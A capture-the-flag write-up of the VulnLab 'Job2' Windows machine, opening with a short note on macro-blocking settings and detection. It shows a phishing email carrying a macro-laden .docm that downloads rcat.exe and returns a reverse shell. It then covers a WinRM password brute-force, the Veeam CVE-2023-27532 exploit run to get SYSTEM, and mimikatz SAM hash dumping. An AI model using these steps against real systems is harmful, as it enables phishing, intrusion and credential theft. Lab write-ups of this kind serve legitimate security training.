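For a .docm built as described above, HasVbaProject comes back True and the size of vbaProject.bin is reported; a plain .docx has no such part. With VBAWarnings at its default of 2 a user who clicks Enable Content still runs an AutoOpen macro, so the settings worth checking are VBAWarnings 3 or 4 and blockcontentexecutionfrominternet, which stops macros in mailed attachments outright. The macro shown on this page also writes an executable into C:\Windows\Tasks and launches it from there, which is a cheap detection point for process-creation monitoring.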

Here we go …

We start with an nmap scan:

Starting Nmap 7.93 ( https://nmap.org ) at 2024-07-11 10:58 CEST
Stats: 0:00:47 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.93% done; ETC: 10:59 (0:00:00 remaining)
Stats: 0:01:01 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 85.00% done; ETC: 11:00 (0:00:00 remaining)
Nmap scan report for job2.vl (10.10.122.114)
Host is up (0.019s latency).
Not shown: 989 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
22/tcp   open  ssh           OpenSSH for_Windows_8.1 (protocol 2.0)
| ssh-hostkey: 
|   3072 a39477ca160eecfb238667c60ae3ca7b (RSA)
|   256 0e2a317094995d95d4f840d5b5368e88 (ECDSA)
|_  256 29312ac355b2f773f2d3bdbcc5c114f0 (ED25519)
25/tcp   open  smtp          hMailServer smtpd
| smtp-commands: JOB2, SIZE 20480000, AUTH LOGIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
80/tcp   open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
111/tcp  open  rpcbind
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
443/tcp  open  ssl/http      Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
| tls-alpn: 
|_  http/1.1
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=www.job2.vl
| Subject Alternative Name: DNS:job2.vl, DNS:www.job2.vl
| Not valid before: 2023-05-09T13:31:40
|_Not valid after:  2122-05-09T13:41:37
|_http-title: Not Found
445/tcp  open  microsoft-ds?
1063/tcp open  rpcbind
2049/tcp open  rpcbind
3389/tcp open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024-07-11T08:59:58+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=JOB2
| Not valid before: 2024-07-10T08:57:44
|_Not valid after:  2025-01-09T08:57:44
Service Info: Host: JOB2; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   311: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2024-07-11T08:59:22
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 69.18 seconds

We examine the website and find out how to apply for the job.

Send your CV twice (of course, first change the LAN test IP in the macro of puck3.docm to your tun0 IP on the VulnLab VPN).

┌──(puck㉿kali)-[~/vulnlab/job2]
└─$ sendemail -s job2.vl -f "puck <puck@vulnlab.com>" -t hr@job2.vl -o tls=no -m "hey pls check my cv http://10.8.2.138/test" -a puck3.docm 

Jun 30 15:53:21 kali sendemail[35338]: Email was sent successfully!

Catch the shell

┌──(puck㉿kali)-[~/vulnlab/job2]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.122.114 - - [11/Jul/2024 11:06:23] "GET /rcat.exe HTTP/1.1" 200 -

┌──(puck㉿kali)-[~/vulnlab/job2]
└─$ rlwrap nc -nlvp 443
listening on [any] 443 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.122.114] 50302
Microsoft Windows [Version 10.0.20348.1668]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State   
============================= ============================== ========
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled

C:\Windows\system32>whoami
job2\julian

C:\Windows\system32>net users

User accounts for \\JOB2

-------------------------------------------------------------------------------
Administrator            DefaultAccount           Ferdinand                
Guest                    Julian                   svc_veeam                
WDAGUtilityAccount       
The command completed successfully.


C:\Windows\system32>

Next I did a brute-force:

┌──(puck㉿kali)-[~/vulnlab/job2]
└─$ crackmapexec winrm 10.10.122.114 -u Ferdinand -p /usr/share/wordlists/rockyou.txt

SMB         10.10.122.114   5985   JOB2             [*] Windows Server 2022 Build 20348 (name:JOB2) (domain:JOB2)
HTTP        10.10.122.114   5985   JOB2             [*] http://10.10.122.114:5985/wsman
WINRM       10.10.122.114   5985   JOB2             [-] JOB2\Ferdinand:123456
WINRM       10.10.122.114   5985   JOB2             [-] JOB2\Ferdinand:12345
WINRM       10.10.122.114   5985   JOB2             [-] JOB2\Ferdinand:123456789
WINRM       10.10.122.114   5985   JOB2             [-] JOB2\Ferdinand:password
WINRM       10.10.122.114   5985   JOB2             [-] JOB2\Ferdinand:iloveyou

and it found Ferdinand’s password.

Next, evil-winrm into the box and find Veeam Backup installed,

then use CVE-2023-27532-RCE-Only to finish JOB2.

┌──(puck㉿kali)-[~/vulnlab/job2]
└─$ evil-winrm -u Ferdinand -p Fr<REDACTED>! -i 10.10.122.114
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Ferdinand\Documents> netstat -ano | findstr /s 9401
  TCP    0.0.0.0:9401           0.0.0.0:0              LISTENING       2132
*Evil-WinRM* PS C:\Users\Ferdinand\Documents> 

*Evil-WinRM* PS C:\temp> upload Veeam.Backup.Interaction.MountService.dll
                                        
Info: Uploading /home/puck/vulnlab/job2/Veeam.Backup.Interaction.MountService.dll to C:\temp\Veeam.Backup.Interaction.MountService.dll
                                        
Data: 573544 bytes of 573544 bytes copied
                                        
Info: Upload successful!
*Evil-WinRM* PS C:\temp> upload veeam.backup.model.dll
                                        
Info: Uploading /home/puck/vulnlab/job2/veeam.backup.model.dll to C:\temp\veeam.backup.model.dll
                                        
Data: 5925652 bytes of 5925652 bytes copied
                                        
Info: Upload successful!
*Evil-WinRM* PS C:\temp> .\VeeamHax.exe --target 127.0.0.1 --cmd c:\temp\rcat_10.8.2.138_443.exe
Targeting 127.0.0.1:9401

and catch the admin shell:

┌──(puck㉿kali)-[~/vulnlab/job2]
└─$ rlwrap nc -nlvp 443
listening on [any] 443 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.103.24] 56039
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\Windows\system32> whoami
whoami
nt authority\system

PS C:\users\Administrator\Desktop> dir
dir


    Directory: C:\users\Administrator\Desktop


Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
-a----          5/3/2023   2:04 PM           1029 LINQPad 5.lnk                                                        
-a----          5/3/2023   4:00 PM             36 root.txt                                                             


PS C:\users\Administrator\Desktop> type root.txt
type root.txt
VL{62e<REDACTED>2b7}
PS C:\users\Administrator\Desktop>

That’s all.

Beyond root

mimikatz # privilege::debug
Privilege '20' OK

mimikatz # lsadump::sam
Domain : JOB2
SysKey : fb3d0b6fd4b888fb0bb4d3a6ba00dcd5
ERROR kull_m_registry_OpenAndQueryWithAlloc ; kull_m_registry_RegOpenKeyEx KO
ERROR kuhl_m_lsadump_getUsersAndSamKey ; kull_m_registry_RegOpenKeyEx SAM Accounts (0x00000005)

mimikatz # token::elevate
Token Id  : 0
User name :
SID name  : NT AUTHORITY\SYSTEM

764     {0;000003e7} 1 D 29290          NT AUTHORITY\SYSTEM     S-1-5-18        (04g,21p)       Primary
 -> Impersonated !
 * Process Token : {0;01a2aee9} 3 F 35131903    JOB2\puck       S-1-5-21-3935782767-3829597994-1046841959-1004  (14g,24p)       Primary
 * Thread Token  : {0;000003e7} 1 D 37906026    NT AUTHORITY\SYSTEM     S-1-5-18        (04g,21p)       Impersonation (Delegation)

mimikatz # lsadump::sam
Domain : JOB2
SysKey : fb3d0b6fd4b888fb0bb4d3a6ba00dcd5
Local SID : S-1-5-21-3935782767-3829597994-1046841959

SAMKey : 36c26e0a457c1d613a608d104acca9e9

RID  : 000001f4 (500)
User : Administrator
  Hash NTLM: 6f2<REDACTED>04a

C:\Users\Julian\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\phishs.bat

powershell \windows\phishsim.ps1

phishsim.ps1 contains:

# Launch Word once at logon
Start-Process "C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE"

# Watch the attachment drop folder for new or changed files
$watcher = New-Object System.IO.FileSystemWatcher
$watcher.Path = 'C:\programdata\attachments'
$watcher.EnableRaisingEvents = $true
$action =
{
    $name = $event.SourceEventArgs.FullPath    
    $changetype = $event.SourceEventArgs.ChangeType    
    Write-Host "$name was $changetype at $(get-date)"
    # Ignore Word's temporary ~$ lock files
    if(!$name.Contains("~")){
        if(Test-Path $name){    
            Write-Host "Opening $name"
            # Open the attachment in Word as the logged-on user; this is what runs an AutoOpen macro
            Start-Process "C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE" -ArgumentList "$name"
            sleep 45
            Write-Host "Resetting.."
            # Kill Word and delete the attachment so the next one gets a clean run
            Get-Process "WINWORD.EXE" | Stop-Process -Force             
            Get-Process "WINWORD" | Stop-Process -Force  
            sleep 5
            Remove-Item $name -Force
         }
    }    
}
Register-ObjectEvent $watcher 'Created' -Action $action
Register-ObjectEvent $watcher 'Changed' -Action $action

# Keep the script alive so the registered event handlers keep firing
for(;;){
    sleep 45
}